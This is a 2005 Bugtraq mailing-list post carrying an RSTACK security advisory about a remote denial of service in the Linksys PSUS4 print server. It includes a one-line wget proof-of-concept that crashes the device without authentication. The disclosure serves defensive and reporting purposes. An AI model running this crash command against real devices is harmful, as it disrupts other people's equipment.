[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
From: laurent oudot <oudot () rstack ! org>
Date: 2005-02-03 22:49:16
Message-ID: 20050203224916.32663.qmail () www ! securityfocus ! com
[Download RAW message or body]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Linksys PSUS4 remote Denial of Service
Date: February 02, 2005
ID: 200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Background
==========
PSUS4 is one of the small embedded Linksys wired print servers.
Affected products
=================
Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)
Description
===========
Rstack team found a tiny denial of service on the Linksys PSUS4. This device has \
problems to handle some weird ugly HTTP requests. No password needed.
Here is an example, to crash a remote PSUS4 :
$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05-- http://192.168.1.2/
=> `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...
=> And the PSUS4 is crashed.
Impact
======
A remote attacker could crash the device (DOS).
Workaround
==========
There is no official workaround at that time. Linksys has been contacted and a patch \
should be available in the future (*). In needed, you can try to filter incoming \
requests by using a specific dedicated reverse proxy, but that might be a too big \
solution for such a little device (hint: a reboot will be necessary after each \
crash).
(*) "ou pas"...
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic